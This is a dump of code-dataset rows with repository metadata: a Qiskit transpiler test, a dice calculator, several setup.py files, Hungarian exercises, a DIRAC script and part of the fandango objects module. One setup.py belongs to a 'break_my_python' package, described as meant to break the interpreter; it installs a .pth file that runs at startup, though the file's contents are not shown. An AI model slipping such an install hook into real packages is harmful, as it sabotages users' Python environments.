] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=redefined-builtin
"""Tests basic functionality of the transpile function"""
from qiskit import QuantumRegister, QuantumCircuit
from qiskit import compile, BasicAer
from qiskit.transpiler import PassManager, transpile_dag, transpile
from qiskit.tools.compiler import circuits_to_qobj
from qiskit.converters import circuit_to_dag
from ..common import QiskitTestCase
class TestTranspile(QiskitTestCase):
    """Test transpile function."""

    def test_pass_manager_empty(self):
        """Test passing an empty PassManager() to the transpiler.

        It should perform no transformations on the circuit.
        """
        qr = QuantumRegister(2)
        circuit = QuantumCircuit(qr)
        circuit.h(qr[0])
        circuit.h(qr[0])
        circuit.cx(qr[0], qr[1])
        circuit.cx(qr[0], qr[1])
        circuit.cx(qr[0], qr[1])
        circuit.cx(qr[0], qr[1])
        dag_circuit = circuit_to_dag(circuit)
        # op counts before and after an empty pass manager must match exactly
        resources_before = dag_circuit.count_ops()

        pass_manager = PassManager()
        dag_circuit = transpile_dag(dag_circuit, pass_manager=pass_manager)
        resources_after = dag_circuit.count_ops()

        self.assertDictEqual(resources_before, resources_after)

    def test_pass_manager_none(self):
        """Test passing the default (None) pass manager to the transpiler.

        It should perform the default qiskit flow:
        unroll, swap_mapper, cx_direction, cx_cancellation, optimize_1q_gates
        and should be equivalent to using tools.compile
        """
        qr = QuantumRegister(2, 'qr')
        circuit = QuantumCircuit(qr)
        circuit.h(qr[0])
        circuit.h(qr[0])
        circuit.cx(qr[0], qr[1])
        circuit.cx(qr[0], qr[1])
        circuit.cx(qr[0], qr[1])
        circuit.cx(qr[0], qr[1])

        coupling_map = [[1, 0]]
        basis_gates = 'u1,u2,u3,cx,id'

        backend = BasicAer.get_backend('qasm_simulator')
        # transpile with pass_manager=None must match the tools.compile path
        circuit2 = transpile(circuit, backend, coupling_map=coupling_map, basis_gates=basis_gates,
                             pass_manager=None)

        qobj = compile(circuit, backend=backend, coupling_map=coupling_map, basis_gates=basis_gates)
        # rebuild a qobj from the transpiled circuit with the same qobj_id so
        # the two objects can be compared for full equality
        qobj2 = circuits_to_qobj(circuit2, backend.name(), basis_gates=basis_gates,
                                 coupling_map=coupling_map, qobj_id=qobj.qobj_id)
        self.assertEqual(qobj, qobj2)
| 34.2 | 100 | 0.665107 | 332 | 2,565 | 4.975904 | 0.331325 | 0.021792 | 0.053269 | 0.058111 | 0.22276 | 0.22276 | 0.186441 | 0.186441 | 0.186441 | 0.127119 | 0 | 0.019857 | 0.234308 | 2,565 | 74 | 101 | 34.662162 | 0.821283 | 0.245224 | 0 | 0.35 | 0 | 0 | 0.016129 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.05 | false | 0.15 | 0.15 | 0 | 0.225 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0cee3a5d83fc06ee8d80703cbf5bab61011eb8f9 | 7,039 | py | Python | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | 1 | 2021-07-29T13:23:58.000Z | 2021-07-29T13:23:58.000Z | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | import random
class Calculator():
symbol=["+","-","*","/","(",")"]
def __init__(self):
pass
def cal(self,s):
if self.isnumber(s[0]):
return s
elif s[0]=="error":
return ["error",s[1]]
elif "(" in s[0] or ")" in s[0]: #or "^" in s[0]:
el=self.analyze(s)
e=el[0]
log=el[1]
return self.cal([e,log])
else:
e=s[0]
log=s[1]
if "-" in e:
ex=e
for x in range(len(e)):
if e[x]=="-":
if x==0:
ex="–"+ex[1:]
elif e[x-1] in self.symbol:
ex=ex[:x]+"–"+ex[x+1:]
e=ex
if "*" in e or "/" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="*"
for x in range(length):
if e[x]=="*" or e[x]=="/":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="*":
result_temp=str(float(target_l)*float(target_r))
elif mark=="/" and target_r!="0":
result_temp=str(float(target_l)/float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
elif "+" in e or "-" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="+"
for x in range(length):
if e[x]=="+" or e[x]=="-":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="+":
result_temp=str(float(target_l)+float(target_r))
elif mark=="-":
result_temp=str(float(target_l)-float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
else:
return ["error",log]
return self.cal([e,log])
def analyze(self,s):
e=s[0]
log=s[1]
while "(" in e or ")" in e:
bracketL=0
bracketR=0
length=len(e)
for x in range(length-1,-1,-1):
if e[x]=="(":
bracketL=x
bracketR=e[x:].find(")")+x
break
rs=e[bracketL+1:bracketR]
log=log+rs+"\n"
result_temp=self.cal([rs,log])
if result_temp[0]=="error":
return ["error",result_temp[1]]
e=e[:bracketL]+result_temp[0]+e[bracketR+1:]
log=result_temp[1]+e+"\n"
return [e,log]
def isnumber(self,s):
try :
float(s)
return True
except:
return False
    def dice(self,s):
        """
        Expand every NdM dice term in expression *s* into a string of
        random rolls "(r1+r2+...+rN)".

        Defaults when omitted: N (count) = 1 roll, M (sides) = 100.
        On invalid terms a Chinese error message starting with '-' is
        returned instead of the expression.
        """
        e=s
        while "d" in e:
            length=len(e)
            dn=e.find("d")
            start=-1
            end=length
            # find where the digits after 'd' end (number of sides)
            for x in range(dn+1,length):
                if not e[x].isdecimal():
                    end=x
                    break
            # find where the digits before 'd' start (number of dice)
            for y in range(dn-1,-1,-1):
                if not e[y].isdecimal():
                    start=y
                    break
            startn=e[start+1:dn]
            endn=e[dn+1:end]
            if startn=="":
                startn=1
            else:
                startn=abs(int(startn))
            if endn=="":
                endn=100
            else:
                endn=abs(int(endn))
            # valid roll: at least one side, 1..100 dice
            if endn!=0 and startn<=100 and startn!=0:
                result_temp="("
                for z in range(startn):
                    result_temp+=str(random.randint(1,endn))
                    if z!=startn-1:
                        result_temp+="+"
                result_temp+=")"
            elif endn==0:
                return "-丢了个卵子"
            elif startn>100:
                return "-丢了一群卵子"
            elif startn==0:
                return "-丢不出卵子,只能丢人了"
            # splice the rolled sum back into the expression
            e=e[:start+1]+result_temp+e[end:]
        return e
def dicetext(self,s,act):
text=self.dice(s)
if text[0:2]=="-丢":
return text[1:]
num=self.cal([text,text+"\n"])
if num[0]!="error":
return "投掷 "+act+" :"+s+" = "+text+" = "+num[0]
else:
return "呜…投个骰子都卡住了……"
#x=Calculator()
#a=input()
#r=x.cal([a,a+"\n"])
#print(r[1][:-1])
#if r[0]=="error":
# print("error")
#print(x.dicetext(a,""))
| 36.661458 | 76 | 0.356016 | 748 | 7,039 | 3.304813 | 0.118984 | 0.064725 | 0.024272 | 0.022249 | 0.542476 | 0.499191 | 0.492718 | 0.486246 | 0.486246 | 0.486246 | 0 | 0.025124 | 0.513709 | 7,039 | 191 | 77 | 36.853403 | 0.692667 | 0.018611 | 0 | 0.442623 | 0 | 0 | 0.025217 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0.005464 | 0.005464 | 0 | 0.15847 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cf19d7af68dc81b523b12d529be9b1094af28ac | 891 | py | Python | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
# the package README becomes the long description shown on PyPI
with open('README.md') as f:
    long_description = f.read()

setup(
    name='break_my_python',
    version='0.0.2',
    description='This package tries to breaks your python interpreter, do not install it',
    long_description=long_description,
    author='Jonathan J. Helmus',
    author_email='jjhelmus@gmail.com',
    url='http://pypi.python.org/pypi/break_my_python/',
    license='LICENSE.txt',
    py_modules=['break_my_python'],
    # installs a .pth file at the environment root; .pth files are executed
    # at interpreter startup - this is the deliberate "break" mechanism
    data_files=[('/', ['break_my_python.pth'])],
    classifiers=[
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ]
)
| 31.821429 | 90 | 0.655443 | 108 | 891 | 5.277778 | 0.583333 | 0.2 | 0.263158 | 0.136842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015278 | 0.191919 | 891 | 27 | 91 | 33 | 0.776389 | 0 | 0 | 0 | 0 | 0 | 0.571268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49078fb3338a8d88957f2187faa7b3d0420743af | 990 | py | Python | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | # feladat.py
# 1. feladat
# Írjon függvényt szokoev_e néven
# A függvény térjen vissza igaz értékkel, ha a paraméterben megadott évszám szőköév
def szokoev_e(ev:int) -> bool:
    """Return True if *ev* is a leap year (Gregorian rules).

    Fix: the original def had no body at all (a SyntaxError); the standard
    rule is implemented: divisible by 4, except centuries not divisible
    by 400.
    """
    return ev % 4 == 0 and (ev % 100 != 0 or ev % 400 == 0)
# 2. feladat
# A függvény bemenő paraméterei az a, b, c egész számok
# Írjon kódot amely eredményeként az a változóba lesz a legnagyobb szám, a b változóba a második legnagyobb szám és a c változóba pedig a legkisebb szám.
def csokkeno(a:int, b:int, c:int)->tuple:
    """Return (largest, middle, smallest) of the three numbers.

    Fix: the original returned [a, b, c] unchanged (no sorting) and as a
    list despite the declared ``tuple`` return type; now the values are
    sorted in decreasing order as the exercise requires.
    """
    return tuple(sorted((a, b, c), reverse=True))
# 3. feladat
# Készítsen palindrom-e nevű függvényt amely egy stringről megállapítja, hogy palidrom-e
# Tágabb értelembe a palindrom olyan szöveg vagy szókapcsolat, amely visszafelé olvasva is ugyanaz
def palindrom_e(mondat:str)->bool:
    """Return True if *mondat* is a palindrome in the broad sense
    (ignoring case, spaces and punctuation).

    Fix: the original stub always returned True.
    """
    # keep only letters/digits, lower-cased, then compare with its reverse
    szoveg = ''.join(ch.lower() for ch in mondat if ch.isalnum())
    return szoveg == szoveg[::-1]
# 4. feladat
# Írjon függvényt amely meghatározza, hogy egy adott intervallumban hány négyzetszám van
# Pl. [1-9] intervallum esetén 1, 2, 3 négyzetei esnek, tehát három négyzetszám van
def negyzetszamok_szama(a:int, b:int)->int:
    """Return how many perfect squares fall in the interval [a, b].

    Fix: the original stub always returned 0. E.g. for [1, 9] the squares
    of 1, 2 and 3 fall inside, so the result is 3.
    """
    if b < a:
        return 0
    count = 0
    i = 0
    while i * i <= b:
        if i * i >= a:
            count += 1
        i += 1
    return count
| 28.285714 | 153 | 0.756566 | 152 | 990 | 4.901316 | 0.565789 | 0.008054 | 0.056376 | 0.021477 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.171717 | 990 | 34 | 154 | 29.117647 | 0.896341 | 0.734343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b3087eb0d5de6a063260501def92d99d71d6436 | 397 | py | Python | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
description='Tech@NYU API Python Client',
author='TechatNYU',
url='https://github.com/TechAtNYU/pytnyu',
author_email='hello@techatnyu.org',
version='0.0.4',
install_requires=['requests'],
namespace_packages=['pytnyu'],
packages=['pytnyu'],
name='pytnyu',
)
| 23.352941 | 46 | 0.677582 | 46 | 397 | 5.782609 | 0.73913 | 0.082707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009174 | 0.176322 | 397 | 16 | 47 | 24.8125 | 0.804281 | 0 | 0 | 0 | 0 | 0 | 0.302267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b373158f05135f2dafba65a6ba39cdf0ba87c6d | 1,348 | py | Python | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | null | null | null | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 1 | 2021-03-04T08:48:38.000Z | 2021-03-04T08:48:38.000Z | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 2 | 2020-08-26T06:36:51.000Z | 2021-03-04T08:08:34.000Z | #!/usr/bin/env python
import DIRAC
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Insert random trigger file into the File Catalog
Usage:
%s [option] lfn
""" % Script.scriptName )
fcType = 'FileCatalog'
Script.parseCommandLine( ignoreErrors = False )
options = Script.getUnprocessedSwitches()
args = Script.getPositionalArgs()
# NOTE(review): DIRAC API imports placed after parseCommandLine() -
# presumably required by DIRAC initialisation order; verify before moving
from DIRAC.Interfaces.API.Dirac import Dirac
dirac = Dirac()
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
fccType = 'DataManagement/FileCatalog'
fcc = FileCatalogClient(fccType)
def getMeta(lfn, metaname):
    '''Return the *metaname* metadata value of directory *lfn* from the
    DIRAC File Catalog; prints the error and returns None on failure or
    when the key is absent.'''
    result = fcc.getDirectoryMetadata(lfn)
    if not result['OK']:
        print result['Message']
        return
    if result['Value'].has_key(metaname):
        return result['Value'][metaname]
def main():
    '''Print the decay card metadata for each LFN given on the command line.'''
    # positional command-line arguments are the LFNs to inspect
    lfns = args
    for lfn in lfns:
        print '================================================================================'
        print 'Decay card for: %s' % lfn
        print '--------------------------------------------------------------------------------'
        # print getMeta(lfn, 'jobOptions')
        print getMeta(lfn, 'decayCard')
        print '--------------------------------------------------------------------------------'

if __name__ == '__main__':
    main()
| 25.923077 | 96 | 0.557864 | 126 | 1,348 | 5.880952 | 0.515873 | 0.048583 | 0.037787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171365 | 1,348 | 51 | 97 | 26.431373 | 0.663384 | 0.04451 | 0 | 0.058824 | 0 | 0 | 0.322555 | 0.209779 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.147059 | null | null | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b4263d7f857ffd13d9244963a213a2d55a3ea6f | 36,145 | py | Python | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/env python2.5
#############################################################################
##
## file : objects.py
##
## description : see below
##
## project : Tango Control System
##
## $Author: srubio@cells.es, tcoutinho@cells.es, homs@esrf.fr $
##
##
## $Revision: 2008 $
##
## copyleft : ALBA Synchrotron Controls Section, CELLS
## Bellaterra
## Spain
##
#############################################################################
##
## This file is part of Tango Control System
##
## Tango Control System is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as published
## by the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## Tango Control System is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
"""
fandango.objects contains method for loading python modules and objects
"on the run", as well as several advanced types used within fandango library
Struct, Decorator and Cached are fundamental types for all fandango API's
It includes 2 wonderful classes: Object (by Alejandro Homs)
and Singleton (by Marc Santiago)
Enum classes are borrowed from taurus.core.utils (by Tiago Coutinho)
"""
import __builtin__
from __builtin__ import object
import traceback
from fandango.functional import *
from operator import isCallable, isSequenceType
from collections import Hashable
from types import MethodType
import threading
import functools
#Python 2-3 conundrum
try:
import queue
import queue as Queue
except:
import Queue
import Queue as queue
try:
from collections import namedtuple #Only available since python 2.6
except:
namedtuple = None
## Inspection methods
def dirModule(module):
    """Return the names defined directly in *module* (re-exported names
    whose __module__ points elsewhere are excluded)."""
    owned = []
    for name, member in module.__dict__.items():
        if getattr(member, '__module__', '') == module.__name__:
            owned.append(name)
    return owned
def findModule(module):
    """Return the filesystem path of *module*; dotted names are resolved
    recursively (parent package path first, then the child inside it).

    NOTE: relies on the ``imp`` module (deprecated, removed in py3.12).
    """
    from imp import find_module
    if '.' not in module:
        # find_module returns (file, pathname, description); keep the path
        return find_module(module)[1]
    else:
        parent,child = module.rsplit('.', 1)
        #mparent = loadModule(parent)
        pparent = findModule(parent)
        pchild = find_module(child, [pparent])[1]
        return pchild
def loadModule(module,modulename=None):
    """Load a python module either from a source file path ('/x/y.py')
    or from a (possibly dotted) module name.

    :param modulename: optional name under which a source file is loaded
    NOTE: relies on the ``imp`` module (deprecated, removed in py3.12).
    """
    import imp
    if modulename or '/' in module or '.py' in module:
        # treat *module* as a path to a source file
        if not modulename:
            modulename = module.split('/')[-1].split('.py')[0]
        # module names must not contain '-' or '.'
        modulename = replaceCl('[-\.]', '_', modulename)
        return imp.load_source(modulename, module)
    elif '.' not in module:
        return imp.load_module(module, *imp.find_module(module))
    else:
        # dotted name: load the parent package, then the child within it
        parent,child = module.rsplit('.', 1)
        mparent = loadModule(parent)
        args = imp.find_module(child, mparent.__path__)
        mchild = imp.load_module(module, *args)
        return mchild
def dirClasses(module,owned=False):
    """Return the class names found in *module*; with owned=True restrict
    the result to classes defined in the module itself."""
    classes = [name for name, member in module.__dict__.items()
               if isinstance(member, type)]
    if not owned:
        return classes
    local = dirModule(module)
    return [name for name in local if name in classes]
def copy(obj):
    """
    Return a copy of a python primitive object.

    Class instances are only supported when they provide a .copy() method
    or an __init__(other=...) / __init__(obj) constructor.
    """
    copier = getattr(obj, 'copy', None)
    if copier is not None:
        return copier()
    klass = type(obj)
    try:
        return klass(other=obj)
    except:
        return klass(obj)
##############################################################################
# Methods for pickling/dumping, passing objects to files/queues
def obj2dict(obj,type_check=True,class_check=False,fltr=None):
    """
    Converts a python object to a dictionary with all its members
    as python primitives

    This can be used in Queues or to convert to str using pickle.dumps

    :param type_check: stringify members whose type is not a builtin
    :param class_check: also store __class__/__bases__/__base__ names
    :param fltr: a callable(name):bool method used to filter member names
    """
    dct = {}
    try:
        for name in dir(obj):
            if fltr and not fltr(name):
                continue
            try:
                attr = getattr(obj,name)
                # skip callables, bookkeeping members and dunders
                if hasattr(attr,'__call__'): continue
                if name == 'inited_class_list': continue
                if name.startswith('__'): continue
                if type_check:
                    try:
                        # non-builtin types are converted: dicts are
                        # shallow-copied, everything else stringified
                        if type(attr).__name__ not in dir(__builtin__):
                            if isinstance(attr,dict):
                                attr = dict((k,v) for k,v in attr.items())
                            else:
                                attr = str(attr)
                    except:
                        continue
                dct[name] = attr
            except Exception,e:
                print(e)
        if class_check:
            klass = obj.__class__
            if '__class__' not in dct:
                dct['__class__'] = klass.__name__
            if '__bases__' not in dct:
                dct['__bases__'] = [b.__name__ for b in klass.__bases__]
            if '__base__' not in dct:
                dct['__base__'] = klass.__base__.__name__
    except Exception,e:
        print(e)
    return(dct)
def pick(filename, keys = []):
    """
    Load a pickled object from *filename*.

    :param keys: optional sequence of keys used to descend into the
        unpickled object (e.g. ['a','b'] returns obj['a']['b'])
    :returns: the unpickled (sub)object, or None when loading fails;
        errors are printed (best-effort behaviour kept from before)

    Fixes: the file is now opened in binary mode ('rb', required by
    pickle on py3 and on Windows) and closed with a context manager, so
    the old ``finally: f.close()`` can no longer raise NameError when
    open() itself failed.
    """
    import pickle
    try:
        with open(filename, 'rb') as f:
            v = pickle.load(f)
    except:
        traceback.print_exc()
        return None
    if keys:
        try:
            for k in keys:
                v = v[k]
        except:
            traceback.print_exc()
    return v
def dump(value, filename, as_dict = False):
    """
    Pickle *value* into *filename*.

    If the object is not directly picklable (or as_dict is True) a
    dictionary of its members obtained with obj2dict() is dumped instead.
    Errors are printed, not raised (best-effort behaviour kept).

    Fixes: the file is now opened in binary mode ('wb', required by
    pickle on py3 and on Windows) and closed with a context manager, so
    the old ``finally: f.close()`` can no longer raise NameError when
    open() itself failed.
    """
    import pickle
    try:
        with open(filename, 'wb') as f:
            if not as_dict:
                try:
                    pickle.dump(value, f)
                except:
                    # fall back to dumping the member dictionary
                    as_dict = True
            if as_dict:
                pickle.dump(obj2dict(value), f)
    except:
        traceback.print_exc()
## Useful class objects
class Struct(object):
    """
    Metamorphic type to pass/retrieve data objects as object or dictionary

    s = Struct(name='obj1',value=3.0)
    s.setCastMethod(lambda k,v: str2type)
    s.cast('3.0') : 3.0
    s.keys() : ['name', 'value']
    s.to_str() : "fandango.Struct({'name': obj1,'value': 3.0,})"
    s.dict() : {'name': 'obj1', 'value': 3.0}
    """
    def __init__(self,*args,**kwargs):
        self.load(*args,**kwargs)
    def load(self,*args,**kwargs):
        # accepts a dict, a sequence of keys, an items list or keywords
        dct = args[0] if len(args)==1 else (args or kwargs)
        if isSequence(dct) and not isDictionary(dct):
            dct = dict.fromkeys(dct) #isDictionary also matches items lists
        [setattr(self,k,v) for k,v in (dct.items()
            if hasattr(dct,'items') else dct)]
    #Overriding dictionary methods
    def update(self,*args,**kwargs): return self.load(*args,**kwargs)
    def keys(self): return self.__dict__.keys()
    def values(self): return self.__dict__.values()
    def items(self): return self.__dict__.items()
    def dict(self): return self.__dict__
    def get(self,k,default=None):
        try: #Some keys may raise exception
            return getattr(self,k,default)
        except:
            return default
    def get_key(self,value):
        """ Reverse lookup: return the first key holding *value* """
        for k,v in self.items():
            if v == value:
                return k
        raise Exception('%s_NotFound!'%value)
    def set(self,k,v): return setattr(self,k,v)
    def setdefault(self,v): self.dict().setdefault(v)
    def pop(self,k): return self.__dict__.pop(k)
    def has_key(self,k): return self.__dict__.has_key(k)  # py2-only dict API
    def __getitem__(self,k): return getattr(self,k)
    def __setitem__(self,k,v): return setattr(self,k,v)
    def __contains__(self,k): return hasattr(self,k)
    def __call__(self,*args,**kwargs):
        """getter with one string, setter if 2 are passed"""
        assert len(args) in (1,2)
        if len(args)==2: setattr(self,args[0],args[1])
        elif len(args)==1 and isString(args[0]): return getattr(self,args[0])
        else: self.load(*args,**kwargs)
    def __repr__(self):
        return 'fandango.Struct({\n'+'\n'.join("\t'%s': %s,"%(k,v)
            for k,v in self.__dict__.items())+'\n\t})'
    def __str__(self):
        return self.__repr__().replace('\n','').replace('\t','')
    def to_str(self,order=None,sep=','):
        """ This method provides a formatable string for sorting"""
        return self.__str__() if order is None else (
            sep.join('%s'%self[k] for k in order))
    def default_cast(self,key=None,value=None):
        """
        This method checks if key is already defined.
        If it is, it will return value as an evaluable string.
        If it is not, then it will do same action on the passed value.
        """
        if key not in self.keys() and not value:
            key,value = None,key #defaults to single argument mode
        value = notNone(value,key and self.get(key))
        if not isString(value):
            return value
        else:
            return str2type(value)
    def cast(self,key=None,value=None,method=None):
        """
        The cast() method is used to convert an struct to a pickable/json obj
        Use set_cast_method(f) to override this call.
        The cast method must accept both key and value keyword arguments.
        """
        return (method or self.default_cast)(key,value)
    def cast_items(self,items=[],update=True):
        """
        The cast() method is used to convert an struct to a pickable/json obj
        """
        items = items or self.items()
        # NOTE(review): the comprehension below iterates self.items() and
        # ignores the 'items' value computed above - likely a bug; confirm
        items = [(k,self.cast(value=v)) for k,v in self.items()]
        if update:
            [self.set(k,v) for k,v in items]
        return items
def _fget(self, var):
    """Template getter: read attribute *var* from *self*."""
    return getattr(self, var)

def _fset(self, value, var):
    """Template setter: write *value* into attribute *var* of *self*."""
    setattr(self, var, value)

def _fdel(self, var):
    """Template deleter: remove attribute *var* from *self*."""
    delattr(self, var)

def make_property(var, fget=_fget, fset=_fset, fdel=_fdel):
    """ This Class is in Beta, not fully implemented yet

    Build a property bound to attribute name *var* from template methods.
    """
    getter = partial(fget, var=var)
    setter = partial(fset, var=var)
    deleter = partial(fdel, var=var)
    return property(getter, setter, deleter, doc='%s property' % var)
class Variable(object):
    """
    This class helps to declare module variables that can share the
    state when updated from parent modules.
    e.g. fandango.DEFAULT_TIME_FORMAT <=> functional.DEFAULT_TIME_FORMAT

    NOTE: __new__ deliberately returns the wrapped *value*, not the
    instance, so ``Variable(x)`` evaluates to ``x`` itself.

    Fixes: object.__new__() is now called without extra arguments (the
    old ``object.__new__(cls, value)`` raises TypeError on py3); the
    setter assigned the undefined name ``v`` (NameError) instead of
    ``value``; a leftover debug print was removed.
    """
    def __new__(cls, value):
        # build the instance explicitly, then hand back its value
        __instance = object.__new__(cls)
        cls.__init__(__instance, value)
        return __instance.value

    def __init__(self, value = None):
        self._value = value

    @property
    def value(self):
        """The wrapped value."""
        return self._value

    @value.setter
    def set_value(self, value):
        self._value = value
#class NamedProperty(property):
#"""
#"""
#def __init__(self,name,fget=None,fset=None,fdel=None):
#self.name = name
#mname = '%s%s'%(name[0].upper(),name[1:])
#lname = '%s%s'%(name[0].lower(),name[1:])
#property.__init__(fget,fset,fdel,doc='NamedProperty(%s)'%self._name)
#def get_attribute_name(self):
#return '_%s'self.name
def NamedProperty(name,fget=None,fset=None,fdel=None):#,doc=None):
    """
